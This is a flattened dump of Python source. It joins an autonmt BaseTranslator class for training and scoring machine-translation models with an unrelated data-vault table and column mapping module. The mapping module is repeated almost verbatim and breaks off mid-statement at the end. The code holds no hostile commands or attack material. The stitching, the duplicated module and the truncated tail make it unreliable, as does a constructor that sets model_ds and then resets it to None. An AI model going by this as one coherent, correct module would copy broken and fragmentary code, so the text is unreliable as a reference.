import os.path import shutil from abc import ABC, abstractmethod from typing import List, Set from autonmt.bundle.metrics import * from autonmt.bundle.utils import * from autonmt.preprocessing.dataset import Dataset from autonmt.preprocessing.processors import normalize_file, pretokenize_file, encode_file, decode_file def _check_datasets(train_ds: Dataset = None, eval_ds: Dataset = None): # Check that train_ds is a Dataset if train_ds and not isinstance(train_ds, Dataset): raise TypeError("'train_ds' must be an instance of 'Dataset' so that we can know the layout of the trained " "model (e.g. checkpoints available, subword model, vocabularies, etc") # Check that train_ds is a Dataset if eval_ds and not isinstance(eval_ds, Dataset): raise TypeError("'eval_ds' must be an instance of 'Dataset' so that we can know the layout of the dataset " "and get the corresponding data (e.g. splits, pretokenized, encoded, stc)") # Check that the preprocessing are compatible if train_ds and eval_ds and ((train_ds.src_lang != eval_ds.src_lang) or (train_ds.trg_lang != eval_ds.trg_lang)): raise ValueError(f"The languages from the train and test datasets are not compatible:\n" f"\t- train_lang_pair=({train_ds.dataset_lang_pair})\n" f"\t- test_lang_pair=({eval_ds.dataset_lang_pair})\n") def _check_supported_metrics(metrics, metrics_supported): # Check metrics = set(metrics) metrics_supported = set(metrics_supported) # Get valid metrics metrics_valid = list(metrics.intersection(metrics_supported)) metrics_valid += [x for x in metrics if x.startswith("hg_")] # Ignore huggingface metrics metrics_valid = set(metrics_valid) metrics_non_valid = metrics.difference(metrics_valid) if metrics_non_valid: print(f"=> [WARNING] These metrics are not supported: {str(metrics_non_valid)}") if metrics == metrics_non_valid: print("\t- [Score]: Skipped. No valid metrics were found.") return metrics_valid class BaseTranslator(ABC): # Global variables total_runs = 0 TOOL_PARSERS = {"sacrebleu": {"filename": "sacrebleu_scores", "py": (parse_sacrebleu_json, "json")}, "bertscore": {"filename": "bertscore_scores", "py": (parse_bertscore_json, "json")}, "comet": {"filename": "comet_scores", "py": (parse_comet_json, "json")}, "beer": {"filename": "beer_scores", "py": (parse_beer_json, "json")}, "huggingface": {"filename": "huggingface_scores", "py": (parse_huggingface_json, "json")}, "fairseq": {"filename": "fairseq_scores", "py": (parse_fairseq_txt, "txt")}, } TOOL2METRICS = {"sacrebleu": {"bleu", "chrf", "ter"}, "bertscore": {"bertscore"}, "comet": {"comet"}, "beer": {"beer"}, "fairseq": {"fairseq"}, # "huggingface": "huggingface", } METRICS2TOOL = {m: tool for tool, metrics in TOOL2METRICS.items() for m in metrics} def __init__(self, engine, run_prefix="model", model_ds=None, src_vocab=None, trg_vocab=None, safe_seconds=3, **kwargs): # Store vars self.engine = engine self.run_prefix = run_prefix self.model_ds = model_ds self.config = {} self.model_ds = None self.safe_seconds = safe_seconds # Set vocab (optional) self.src_vocab = src_vocab self.trg_vocab = trg_vocab # Check dataset _check_datasets(train_ds=self.model_ds) if self.model_ds else None def _get_metrics_tool(self, metrics): tools = set() for m in metrics: if m.startswith("hg_"): m_tool = "huggingface" else: m_tool = self.METRICS2TOOL.get(m) # Add tools if m_tool: tools.add(m_tool) return tools def _add_config(self, key: str, values: dict, reset=False): def is_valid(k, v): primitive_types = (str, bool, int, float, dict, set, list) # Problems with list of objects return not(k.startswith("_") or k in {"kwargs"}) and (isinstance(v, primitive_types) or v is None) def parse_value(x): if isinstance(x, (list, set)): return [str(_x) for _x in x] return str(x) # Reset value (if needed) if reset or key not in self.config: self.config[key] = {} # Update values self.config[key].update({k: parse_value(v) for k, v in values.items() if is_valid(k, v)}) def fit(self, train_ds, max_tokens=None, batch_size=128, max_epochs=1, learning_rate=0.001, optimizer="adam", weight_decay=0, gradient_clip_val=0.0, accumulate_grad_batches=1, criterion="cross_entropy", patience=None, seed=None, devices="auto", accelerator="auto", num_workers=0, monitor="loss", resume_training=False, force_overwrite=False, **kwargs): print("=> [Fit]: Started.") # Set model self.model_ds = train_ds # Store config (and save file) self._add_config(key="fit", values=locals(), reset=False) self._add_config(key="fit", values=kwargs, reset=False) logs_path = train_ds.get_model_logs_path(toolkit=self.engine, run_name=train_ds.get_run_name(self.run_prefix)) make_dir(logs_path) save_json(self.config, savepath=os.path.join(logs_path, "config_train.json")) # Train and preprocess self.preprocess(train_ds, force_overwrite=force_overwrite, **kwargs) self.train(train_ds, max_tokens=max_tokens, batch_size=batch_size, max_epochs=max_epochs, learning_rate=learning_rate, optimizer=optimizer, weight_decay=weight_decay, gradient_clip_val=gradient_clip_val, accumulate_grad_batches=accumulate_grad_batches, criterion=criterion, patience=patience, seed=seed, devices=devices, accelerator=accelerator, num_workers=num_workers, monitor=monitor, resume_training=resume_training, force_overwrite=force_overwrite, **kwargs) def predict(self, eval_datasets: List[Dataset], beams: List[int] = None, metrics: Set[str] = None, batch_size=64, max_tokens=None, max_len_a=1.2, max_len_b=50, truncate_at=None, devices="auto", accelerator="auto", num_workers=0, load_best_checkpoint=False, model_ds=None, force_overwrite=False, **kwargs): print("=> [Predict]: Started.") # Set default values if beams is None: beams = [5] else: beams = list(set(beams)) beams.sort(reverse=True) # Default metrics if metrics is None: metrics = {"bleu"} else: metrics = set(metrics) # Get model dataset if model_ds: self.model_ds = model_ds elif self.model_ds: pass else: raise ValueError(f"Missing 'model_ds'. It's needed to get the model's path (training and eval).") # Store config self._add_config(key="predict", values=locals(), reset=False) self._add_config(key="predict", values=kwargs, reset=False) logs_path = self.model_ds.get_model_logs_path(toolkit=self.engine, run_name=self.model_ds.get_run_name(self.run_prefix)) make_dir(logs_path) save_json(self.config, savepath=os.path.join(logs_path, "config_predict.json")) # Translate and score eval_scores = [] eval_datasets = self.model_ds.get_eval_datasets(eval_datasets) for eval_ds in eval_datasets: self.translate(model_ds=self.model_ds, eval_ds=eval_ds, beams=beams, max_len_a=max_len_a, max_len_b=max_len_b, truncate_at=truncate_at, batch_size=batch_size, max_tokens=max_tokens, devices=devices, accelerator=accelerator, num_workers=num_workers, load_best_checkpoint=load_best_checkpoint, force_overwrite=force_overwrite, **kwargs) self.score(model_ds=self.model_ds, eval_ds=eval_ds, beams=beams, metrics=metrics, force_overwrite=force_overwrite, **kwargs) model_scores = self.parse_metrics(model_ds=self.model_ds, eval_ds=eval_ds, beams=beams, metrics=metrics, engine=self.engine, force_overwrite=force_overwrite, **kwargs) eval_scores.append(model_scores) return eval_scores @abstractmethod def _preprocess(self, *args, **kwargs): pass def preprocess(self, ds: Dataset, force_overwrite, **kwargs): print(f"=> [Preprocess]: Started. ({ds.id2(as_path=True)})") # Set vars src_lang = ds.src_lang trg_lang = ds.trg_lang train_path = ds.get_encoded_path(fname=ds.train_name) val_path = ds.get_encoded_path(fname=ds.val_name) test_path = ds.get_encoded_path(fname=ds.test_name) model_src_vocab_path = ds.get_vocab_file(lang=src_lang) model_trg_vocab_path = ds.get_vocab_file(lang=trg_lang) model_data_bin_path = ds.get_model_data_bin(toolkit=self.engine) # Create dirs make_dir([model_data_bin_path]) start_time = time.time() self._preprocess(ds=ds, src_lang=src_lang, trg_lang=trg_lang, output_path=model_data_bin_path, train_path=train_path, val_path=val_path, test_path=test_path, src_vocab_path=model_src_vocab_path, trg_vocab_path=model_trg_vocab_path, force_overwrite=force_overwrite, **kwargs) print(f"\t- [INFO]: Preprocess time: {str(datetime.timedelta(seconds=time.time()-start_time))}") @abstractmethod def _train(self, *args, **kwargs): pass def train(self, train_ds: Dataset, resume_training, force_overwrite, **kwargs): print(f"=> [Train]: Started. ({train_ds.id2(as_path=True)})") # Check preprocessing _check_datasets(train_ds=train_ds) # Check debug if is_debug_enabled(): print("\t=> [WARNING]: Debug is enabled. This could lead to critical problems when using a data parallel strategy.") # Set run name run_name = train_ds.get_run_name(self.run_prefix) # Set paths data_bin_path = train_ds.get_model_data_bin(toolkit=self.engine) checkpoints_dir = train_ds.get_model_checkpoints_path(toolkit=self.engine, run_name=run_name) logs_path = train_ds.get_model_logs_path(toolkit=self.engine, run_name=run_name) # Create dirs make_dir([data_bin_path, checkpoints_dir, logs_path]) # Set seed self.manual_seed(seed=kwargs.get("seed")) start_time = time.time() self._train(data_bin_path=data_bin_path, checkpoints_dir=checkpoints_dir, logs_path=logs_path, run_name=run_name, ds_alias='_'.join(train_ds.id()), resume_training=resume_training, force_overwrite=force_overwrite, **kwargs) print(f"\t- [INFO]: Training time: {str(datetime.timedelta(seconds=time.time()-start_time))}") @abstractmethod def _translate(self, *args, **kwargs): pass def translate(self, model_ds: Dataset, eval_ds: Dataset, beams: List[int], max_len_a, max_len_b, truncate_at, batch_size, max_tokens, num_workers, force_overwrite, **kwargs): print(f"=> [Translate]: Started. ({model_ds.id2(as_path=True)})") # Check preprocessing _check_datasets(train_ds=model_ds, eval_ds=eval_ds) assert model_ds.dataset_lang_pair == eval_ds.dataset_lang_pair # Set run names run_name = model_ds.get_run_name(self.run_prefix) eval_name = '_'.join(eval_ds.id()) # Subword model and vocab size don't characterize the dataset! # Checkpoints dir checkpoints_dir = model_ds.get_model_checkpoints_path(self.engine, run_name) # [Trained model]: Create eval folder model_src_vocab_path = model_ds.get_vocab_file(lang=model_ds.src_lang) # Needed to preprocess model_trg_vocab_path = model_ds.get_vocab_file(lang=model_ds.trg_lang) # Needed to preprocess model_eval_data_path = model_ds.get_model_eval_data_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name) model_eval_data_bin_path = model_ds.get_model_eval_data_bin_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name) # Create dirs make_dir([model_eval_data_path, model_eval_data_bin_path]) # [Encode extern data]: Encode test data using the subword model of the trained model for ts_fname in [fname for fname in eval_ds.split_names_lang if eval_ds.test_name in fname]: lang = ts_fname.split('.')[-1] input_file = eval_ds.get_split_path(ts_fname) # as raw as possible output_file = model_ds.get_model_eval_data_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name) # Create directories make_dir([ os.path.join(output_file, "raw"), os.path.join(output_file, "normalized"), os.path.join(output_file, "tokenized"), os.path.join(output_file, "encoded"), ]) # Copy raw raw_file = os.path.join(output_file, "raw", ts_fname) shutil.copyfile(input_file, raw_file) input_file = raw_file # Normalize data norm_file = os.path.join(output_file, "normalized", ts_fname) normalize_file(input_file=input_file, output_file=norm_file, normalizer=model_ds.normalizer, force_overwrite=force_overwrite) input_file = norm_file # Pretokenize data (if needed) if model_ds.pretok_flag: pretok_file = os.path.join(output_file, "tokenized", ts_fname) pretokenize_file(input_file=input_file, output_file=pretok_file, lang=lang, force_overwrite=force_overwrite) input_file = pretok_file # Encode file enc_file = os.path.join(output_file, "encoded", ts_fname) encode_file(ds=model_ds, input_file=input_file, output_file=enc_file, lang=lang, merge_vocabs=model_ds.merge_vocabs, truncate_at=truncate_at, force_overwrite=force_overwrite) # Preprocess external data test_path = os.path.join(model_eval_data_path, "encoded", eval_ds.test_name) self._preprocess(ds=model_ds, src_lang=model_ds.src_lang, trg_lang=model_ds.trg_lang, output_path=model_eval_data_bin_path, train_path=None, val_path=None, test_path=test_path, src_vocab_path=model_src_vocab_path, trg_vocab_path=model_trg_vocab_path, subword_model=model_ds.subword_model, pretok_flag=model_ds.pretok_flag, external_data=True, force_overwrite=force_overwrite, **kwargs) # Iterate over beams for beam in beams: start_time = time.time() # Create output path (if needed) output_path = model_ds.get_model_beam_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, beam=beam) make_dir(output_path) # Translate tok_flag = [os.path.exists(os.path.join(output_path, f)) for f in ["hyp.tok"]] if force_overwrite or not all(tok_flag): self._translate( src_lang=model_ds.src_lang, trg_lang=model_ds.trg_lang, beam_width=beam, max_len_a=max_len_a, max_len_b=max_len_b, batch_size=batch_size, max_tokens=max_tokens, data_bin_path=model_eval_data_bin_path, output_path=output_path, checkpoints_dir=checkpoints_dir, model_src_vocab_path=model_src_vocab_path, model_trg_vocab_path=model_trg_vocab_path, num_workers=num_workers, model_ds=model_ds, force_overwrite=force_overwrite, **kwargs) # Copy src/ref raw for fname, lang in [("src", model_ds.src_lang), ("ref", model_ds.trg_lang)]: raw_file = model_ds.get_model_eval_data_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, fname=f"normalized/test.{lang}") output_file = os.path.join(output_path, f"{fname}.txt") shutil.copyfile(raw_file, output_file) # Postprocess tokenized files for fname, lang in [("hyp", model_ds.trg_lang)]: input_file = os.path.join(output_path, f"{fname}.tok") output_file = os.path.join(output_path, f"{fname}.txt") model_vocab_path = model_src_vocab_path if lang == model_ds.src_lang else model_trg_vocab_path # Post-process files decode_file(input_file=input_file, output_file=output_file, lang=lang, subword_model=model_ds.subword_model, pretok_flag=model_ds.pretok_flag, model_vocab_path=model_vocab_path, remove_unk_hyphen=True, force_overwrite=force_overwrite) # Check amount of lines ref_lines = len(open(os.path.join(output_path, "ref.txt"), 'r').readlines()) hyp_lines = len(open(os.path.join(output_path, "hyp.txt"), 'r').readlines()) if ref_lines != hyp_lines: raise ValueError(f"The number of lines in 'ref.txt' ({ref_lines}) and 'hyp.txt' ({hyp_lines}) " f"does not match. If you see a 'CUDA out of memory' message, try again with " f"smaller batch.") print(f"\t- [INFO]: Translating time (beam={str(beam)}): {str(datetime.timedelta(seconds=time.time() - start_time))}") def score(self, model_ds: Dataset, eval_ds: Dataset, beams: List[int], metrics: Set[str], force_overwrite, **kwargs): print(f"=> [Score]: Started. ({model_ds.id2(as_path=True)})") # Check preprocessing _check_datasets(train_ds=model_ds, eval_ds=eval_ds) assert model_ds.dataset_lang_pair == eval_ds.dataset_lang_pair # Check supported metrics metrics_valid = _check_supported_metrics(metrics, self.METRICS2TOOL.keys()) if not metrics_valid: return # Set run names run_name = model_ds.get_run_name(self.run_prefix) eval_name = '_'.join(eval_ds.id()) # Subword model and vocab size don't characterize the dataset! # Iterate over beams for beam in beams: start_time = time.time() # Paths beam_path = model_ds.get_model_beam_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, beam=beam) scores_path = model_ds.get_model_scores_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, beam=beam) # Create dirs make_dir([scores_path]) # Set input files (results) src_file_path = os.path.join(beam_path, "src.txt") ref_file_path = os.path.join(beam_path, "ref.txt") hyp_file_path = os.path.join(beam_path, "hyp.txt") # Check that the paths exists if not all([os.path.exists(p) for p in [src_file_path, ref_file_path, hyp_file_path]]): raise IOError("Missing files to compute scores") # Score: bleu, chrf and ter if self.TOOL2METRICS["sacrebleu"].intersection(metrics): output_file = os.path.join(scores_path, f"sacrebleu_scores.json") if force_overwrite or not os.path.exists(output_file): compute_sacrebleu(ref_file=ref_file_path, hyp_file=hyp_file_path, output_file=output_file, metrics=metrics) # Score: bertscore if self.TOOL2METRICS["bertscore"].intersection(metrics): output_file = os.path.join(scores_path, f"bertscore_scores.json") if force_overwrite or not os.path.exists(output_file): compute_bertscore(ref_file=ref_file_path, hyp_file=hyp_file_path, output_file=output_file, trg_lang=model_ds.trg_lang) # Score: comet if self.TOOL2METRICS["comet"].intersection(metrics): output_file = os.path.join(scores_path, f"comet_scores.json") if force_overwrite or not os.path.exists(output_file): compute_comet(src_file=src_file_path, ref_file=ref_file_path, hyp_file=hyp_file_path, output_file=output_file) # Score: fairseq if self.TOOL2METRICS["fairseq"].intersection(metrics): output_file = os.path.join(scores_path, f"fairseq_scores.txt") if force_overwrite or not os.path.exists(output_file): compute_fairseq(ref_file=ref_file_path, hyp_file=hyp_file_path, output_file=output_file) # Huggingface metrics hg_metrics = {x[3:] for x in metrics if x.startswith("hg_")} if hg_metrics: output_file = os.path.join(scores_path, f"huggingface_scores.json") if force_overwrite or not os.path.exists(output_file): compute_huggingface(src_file=src_file_path, hyp_file=hyp_file_path, ref_file=ref_file_path, output_file=output_file, metrics=hg_metrics, trg_lang=model_ds.trg_lang) print(f"\t- [INFO]: Scoring time (beam={str(beam)}): {str(datetime.timedelta(seconds=time.time() - start_time))}") def parse_metrics(self, model_ds, eval_ds, beams: List[int], metrics: Set[str], force_overwrite, **kwargs): print(f"=> [Parsing]: Started. ({model_ds.id2(as_path=True)})") # Check preprocessing _check_datasets(train_ds=model_ds, eval_ds=eval_ds) assert model_ds.dataset_lang_pair == eval_ds.dataset_lang_pair # Check supported metrics metrics_valid = _check_supported_metrics(metrics, self.METRICS2TOOL.keys()) if not metrics_valid: return # Metrics to retrieve metric_tools = self._get_metrics_tool(metrics) # Set run names run_name = model_ds.get_run_name(self.run_prefix) eval_name = '_'.join(eval_ds.id()) # Subword model and vocab size don't characterize the dataset! # Walk through beams scores = { "engine": kwargs.get("engine"), "lang_pair": model_ds.dataset_lang_pair, "train_dataset": model_ds.dataset_name, "eval_dataset": eval_ds.dataset_name, "subword_model": str(model_ds.subword_model).lower(), "vocab_size": str(model_ds.vocab_size).lower(), "run_name": run_name, "train_max_lines": model_ds.dataset_lines, "beams": {}, "config": self.config, } # Iterate over beams for beam in beams: # Paths scores_path = model_ds.get_model_scores_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, beam=beam) # Walk through metric files beam_scores = {} for m_tool in metric_tools: values = self.TOOL_PARSERS[m_tool] m_parser, ext = values["py"] m_fname = f"{values['filename']}.{ext}" # Read file filename = os.path.join(scores_path, m_fname) if os.path.exists(filename): try: with open(filename, 'r') as f: m_scores = m_parser(text=f.readlines()) for m_name, m_values in m_scores.items(): # [bleu_score, chrf_score, ter_score], [bertscore_precision] for score_name, score_value in m_values.items(): m_name_full = f"{m_tool}_{m_name}_{score_name}".lower().strip() beam_scores[m_name_full] = score_value except Exception as e: print(f"\t- [PARSING ERROR]: ({m_fname}) {str(e)}") else: print(f"\t- [WARNING]: There are no metrics from '{m_tool}'") # Add beam scores scores["beams"].update({f"beam{str(beam)}": beam_scores}) return scores @staticmethod def manual_seed(seed, use_deterministic_algorithms=False): import torch import random import numpy as np from pytorch_lightning.utilities.seed import seed_everything # Define seed seed = seed if seed is not None else int(time.time()) % 2**32 # Set seeds random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) seed_everything(seed) # Tricky: https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html torch.use_deterministic_algorithms(use_deterministic_algorithms) # Test randomness print(f"\t- [INFO]: Testing random seed ({seed}):") print(f"\t\t- random: {random.random()}") print(f"\t\t- numpy: {np.random.rand(1)}") print(f"\t\t- torch: {torch.rand(1)}") return seed
import csv, re from os import path from pathlib import Path from itertools import groupby from .dbobjects import Column, Table, Schema, create_typed_table, MetaDataError, MetaDataWarning TRANSFORM_PARAM_RE = re.compile(r"\$(\d+)") class TableMappings(list): def __init__(self, table_mappings): super().__init__(table_mappings) @classmethod def read(cls, path): paths = Path(path).glob('*.csv') table_mappings = [] for path in paths: with open(path, encoding='utf-8') as mappings_file: table_mappings += list(csv.DictReader(mappings_file, delimiter=',')) return TableMappings(table_mappings) def from_table(self, schema, table): return TableMappings([ mapping for mapping in self if mapping['source_schema'] == schema and mapping['source_table'] == table ]) def to_table(self, schema, table): return TableMappings([ mapping for mapping in self if mapping['target_schema'] == schema and mapping['target_table'] == table ]) def print_mappings(self): for mapping in self: print('{source_schema}.{source_table}\t{source_filter}\t{target_schema}.{target_table}'.format(**mapping)) class ColumnMappings(list): def __init__(self, column_mappings): super().__init__(column_mappings) @classmethod def read(cls, path): paths = Path(path).glob('*.csv') column_mappings = [] for path in paths: with open(path, encoding='utf-8') as mappings_file: column_mappings += [m for m in csv.DictReader(mappings_file, dialect=csv.excel) if not m['src_schema'].startswith('--')] return ColumnMappings(column_mappings) def from_table(self, schema, table): return ColumnMappings([ mapping for mapping in self if mapping['src_schema'] == schema and mapping['src_table'] == table ]) def to_table(self, schema, table): return ColumnMappings([ mapping for mapping in self if mapping['tgt_schema'] == schema and mapping['tgt_table'] == table ]) def from_column(self, schema, table, column): return ColumnMappings([ mapping for mapping in self if mapping['src_schema'] == schema and mapping['src_table'] == table and mapping['src_column'] == column ]) def to_column(self, schema=None, table=None, column=None): if isinstance(column, Column): schema = column.parent.schema table = column.parent.name column = column.name return ColumnMappings([ mapping for mapping in self if mapping['tgt_schema'] == schema and mapping['tgt_table'] == table and mapping['tgt_column'] == column ]) def to_column_list(self, column): column_mappings = self.to_column(column.parent.schema, column.parent.name, column.name) return [{ 'source_full_name': '{src_schema}.{src_table}.{src_column}'.format(**column_mapping), 'source': '{src_column}'.format(**column_mapping), 'transformation': column_mapping['transformation'] } for column_mapping in column_mappings] def source_tables(self): schema_table_name = lambda m: [m['src_schema'], m['src_table']] table_groups = groupby(sorted(self, key=schema_table_name), key=schema_table_name) tables = [ create_typed_table(Table( key[0], key[1], [Column(column, None, None) for column in set(m['src_column'] for m in group)], None )) for key, group in table_groups] return tables def target_tables(self): schema_table_name = lambda m: [m['tgt_schema'], m['tgt_table']] table_groups = groupby(sorted(self, key=schema_table_name), key=schema_table_name) tables = [ create_typed_table(Table( key[0], key[1], [Column(column, None, None) for column in dict.fromkeys(m['tgt_column'] for m in group)], # order preserving dedup None )) for key, group in table_groups] return tables def print_mappings(self): for mapping in self: print('{src_schema}.{src_table}.{src_column}\t{transformation}\t{tgt_schema}.{tgt_table}.{tgt_column}'.format(**mapping)) def apply_transform(column_names, transform, prefix): if prefix: column_names = ["{}.{}".format(prefix, column_name) for column_name in column_names] if transform: # params = TRANSFORM_PARAM_RE.findall(transform) return TRANSFORM_PARAM_RE.sub(lambda s: column_names[int(s.group(1)) - 1], transform) else: return ';'.join(column_names) class Mappings: def __init__(self, table_mappings, column_mappings, tables): self.table_mappings = table_mappings self.column_mappings = column_mappings self.tables = tables self._table_dict = dict((table.full_name, table) for table in tables) def source_tables(self, target_table): source_mappings = self.table_mappings.to_table(target_table.schema, target_table.name) source_table_names = ['{source_schema}.{source_table}'.format(**m) for m in source_mappings] source_tables = [self._table_dict.get(table_name) for table_name in source_table_names] return [source_table for source_table in source_tables if source_table] def source_table(self, target_table): source_tables = self.source_tables(target_table) if len(source_tables) > 0: return source_tables[0] else: return None def filter(self, source_table, target_table): mappings = (self.table_mappings .from_table(source_table.schema, source_table.name) .to_table(target_table.schema, target_table.name) ) try: return mappings[0]['source_filter'] except IndexError: return None def source_columns(self, source_table, target_column, prefix=None): if target_column: target_table = target_column.parent source_column_mappings = self.column_mappings.to_table(target_table.schema, target_table.name) if source_table: target_column_mappings = source_column_mappings.from_table(source_table.schema, source_table.name) else: target_column_mappings = source_column_mappings source_maps = target_column_mappings.to_column_list(target_column) result = [ apply_transform(source_map['source'].split(';'), source_map['transformation'], prefix) for source_map in source_maps ] return result else: return [] def source_column(self, source_table, target_column, prefix=None): source_columns = self.source_columns(source_table, target_column, prefix) if len(source_columns) > 0: return source_columns[0] else: return None def source_column_objects(self, target_column, source_table=None): source_column_mappings = self.column_mappings.to_column(column=target_column) if source_table: source_column_mappings = source_column_mappings.from_table(source_table.schema, source_table.name) result = [ self._table_dict[f"{m["src_schema"]}.{m["src_table"]}"][m['src_column']] for m in source_column_mappings ] return result def source_column_object(self, target_column, source_table=None): source_columns = self.source_column_objects(target_column, source_table) if len(source_columns) > 0: return source_columns[0] else: return None def check(self, target_table): source_mappings = self.table_mappings.to_table(target_table.schema, target_table.name) source_table_names = ['{source_schema}.{source_table}'.format(**m) for m in source_mappings] if len(source_mappings) == 0: raise MetaDataError('There is no table mappings to {target_table_name}'.format( target_table_name=target_table.full_name )) source_tables = self.source_tables(target_table) if len(source_tables) == 0: raise MetaDataError('There is no column mappings to {target_table_name} from {source_table_names}'.format( target_table_name=target_table.full_name, source_table_names=', '.join(source_table_names) )) for target_column in target_table.columns: # print(target_column) if target_table.table_type in ['version_pointer']: src_columns = self.column_mappings.to_column(target_table.schema, target_table.name, target_column.name) if len(src_columns) < 1: raise MetaDataError(f'There is no mapping to {target_column.full_name}') else: for source_table in source_tables: # print(source_table.full_name) source_column = self.source_column(source_table, target_column) # print(source_column) if source_column == None: raise MetaDataError('There is no mapping to {target_column_name} from {source_table_name}'.format( target_column_name=target_column.full_name, source_table_name=source_table.full_name )) def path(self, vp): source_tables = set(l.full_name for l in self.source_tables(vp)) metrics_mapping = self.column_mappings.to_column(vp.schema, vp.name, vp.metrics_key.name)[0] context_mapping = self.column_mappings.to_column(vp.schema, vp.name, vp.context_key.name)[0] current_column = vp.parent[metrics_mapping['src_table']][metrics_mapping['src_column']] goal_column = vp.parent[context_mapping['src_table']][context_mapping['src_column']] # print('goal:', goal_column.full_name) path_ = [current_column] seen = set([current_column.full_name]) while current_column.full_name != goal_column.full_name: # print('current:', current_column.full_name) current_table = current_column.parent if current_table.table_type == 'hub': goals = [ sat.key for sat in current_table.related_satellites if sat.key.full_name not in seen and sat.key == goal_column ] if goals: current_column = goals[0] else: columns = [ fk.columns[0] for l in current_table.related_links for fk in l.fks if l.full_name in source_tables and fk.columns[0].full_name not in seen and fk.foreign_table_name == current_table.name ] if columns: current_column = columns[0] else: raise MetaDataError(f'No link from {current_column.full_name}') elif current_table.table_type == 'link': columns = [ (fk.foreign_columns[0], fk.columns[0]) for fk in current_table.fks if fk.columns[0].full_name not in seen and fk.foreign_table.full_name in source_tables ] if columns: (current_column, link_key) = columns[0] path_.append(link_key) seen.add(link_key.full_name) else: raise MetaDataError(f'No hub from {current_column.full_name}') elif current_table.table_type == 'satellite': current_column = current_table.related_hub[0].key else: raise MetaDataError(f'Wrong type, table={current_table} should not be in a vp path') path_.append(current_column) seen.add(current_column.full_name) return path_ def link_path(self, vp): link_columns = [c for c in self.path(vp) if c.parent.table_type == 'link'] grouped = [list(g) for _, g in groupby(link_columns, lambda c: c.parent.name)] return grouped
import csv, re from os import path from pathlib import Path from itertools import groupby from .dbobjects import Column, Table, Schema, create_typed_table, MetaDataError, MetaDataWarning TRANSFORM_PARAM_RE = re.compile(r"\$(\d+)") class TableMappings(list): def __init__(self, table_mappings): super().__init__(table_mappings) @classmethod def read(cls, path): paths = Path(path).glob('*.csv') table_mappings = [] for path in paths: with open(path, encoding='utf-8') as mappings_file: table_mappings += list(csv.DictReader(mappings_file, delimiter=',')) return TableMappings(table_mappings) def from_table(self, schema, table): return TableMappings([ mapping for mapping in self if mapping['source_schema'] == schema and mapping['source_table'] == table ]) def to_table(self, schema, table): return TableMappings([ mapping for mapping in self if mapping['target_schema'] == schema and mapping['target_table'] == table ]) def print_mappings(self): for mapping in self: print('{source_schema}.{source_table}\t{source_filter}\t{target_schema}.{target_table}'.format(**mapping)) class ColumnMappings(list): def __init__(self, column_mappings): super().__init__(column_mappings) @classmethod def read(cls, path): paths = Path(path).glob('*.csv') column_mappings = [] for path in paths: with open(path, encoding='utf-8') as mappings_file: column_mappings += [m for m in csv.DictReader(mappings_file, dialect=csv.excel) if not m['src_schema'].startswith('--')] return ColumnMappings(column_mappings) def from_table(self, schema, table): return ColumnMappings([ mapping for mapping in self if mapping['src_schema'] == schema and mapping['src_table'] == table ]) def to_table(self, schema, table): return ColumnMappings([ mapping for mapping in self if mapping['tgt_schema'] == schema and mapping['tgt_table'] == table ]) def from_column(self, schema, table, column): return ColumnMappings([ mapping for mapping in self if mapping['src_schema'] == schema and mapping['src_table'] == table and mapping['src_column'] == column ]) def to_column(self, schema=None, table=None, column=None): if isinstance(column, Column): schema = column.parent.schema table = column.parent.name column = column.name return ColumnMappings([ mapping for mapping in self if mapping['tgt_schema'] == schema and mapping['tgt_table'] == table and mapping['tgt_column'] == column ]) def to_column_list(self, column): column_mappings = self.to_column(column.parent.schema, column.parent.name, column.name) return [{ 'source_full_name': '{src_schema}.{src_table}.{src_column}'.format(**column_mapping), 'source': '{src_column}'.format(**column_mapping), 'transformation': column_mapping['transformation'] } for column_mapping in column_mappings] def source_tables(self): schema_table_name = lambda m: [m['src_schema'], m['src_table']] table_groups = groupby(sorted(self, key=schema_table_name), key=schema_table_name) tables = [ create_typed_table(Table( key[0], key[1], [Column(column, None, None) for column in set(m['src_column'] for m in group)], None )) for key, group in table_groups] return tables def target_tables(self): schema_table_name = lambda m: [m['tgt_schema'], m['tgt_table']] table_groups = groupby(sorted(self, key=schema_table_name), key=schema_table_name) tables = [ create_typed_table(Table( key[0], key[1], [Column(column, None, None) for column in dict.fromkeys(m['tgt_column'] for m in group)], # order preserving dedup None )) for key, group in table_groups] return tables def print_mappings(self): for mapping in self: print('{src_schema}.{src_table}.{src_column}\t{transformation}\t{tgt_schema}.{tgt_table}.{tgt_column}'.format(**mapping)) def apply_transform(column_names, transform, prefix): if prefix: column_names = ["{}.{}".format(prefix, column_name) for column_name in column_names] if transform: # params = TRANSFORM_PARAM_RE.findall(transform) return TRANSFORM_PARAM_RE.sub(lambda s: column_names[int(s.group(1)) - 1], transform) else: return ';'.join(column_names) class Mappings: def __init__(self, table_mappings, column_mappings, tables): self.table_mappings = table_mappings self.column_mappings = column_mappings self.tables = tables self._table_dict = dict((table.full_name, table) for table in tables) def source_tables(self, target_table): source_mappings = self.table_mappings.to_table(target_table.schema, target_table.name) source_table_names = ['{source_schema}.{source_table}'.format(**m) for m in source_mappings] source_tables = [self._table_dict.get(table_name) for table_name in source_table_names] return [source_table for source_table in source_tables if source_table] def source_table(self, target_table): source_tables = self.source_tables(target_table) if len(source_tables) > 0: return source_tables[0] else: return None def filter(self, source_table, target_table): mappings = (self.table_mappings .from_table(source_table.schema, source_table.name) .to_table(target_table.schema, target_table.name) ) try: return mappings[0]['source_filter'] except IndexError: return None def source_columns(self, source_table, target_column, prefix=None): if target_column: target_table = target_column.parent source_column_mappings = self.column_mappings.to_table(target_table.schema, target_table.name) if source_table: target_column_mappings = source_column_mappings.from_table(source_table.schema, source_table.name) else: target_column_mappings = source_column_mappings source_maps = target_column_mappings.to_column_list(target_column) result = [ apply_transform(source_map['source'].split(';'), source_map['transformation'], prefix) for source_map in source_maps ] return result else: return [] def source_column(self, source_table, target_column, prefix=None): source_columns = self.source_columns(source_table, target_column, prefix) if len(source_columns) > 0: return source_columns[0] else: return None def source_column_objects(self, target_column, source_table=None): source_column_mappings = self.column_mappings.to_column(column=target_column) if source_table: source_column_mappings = 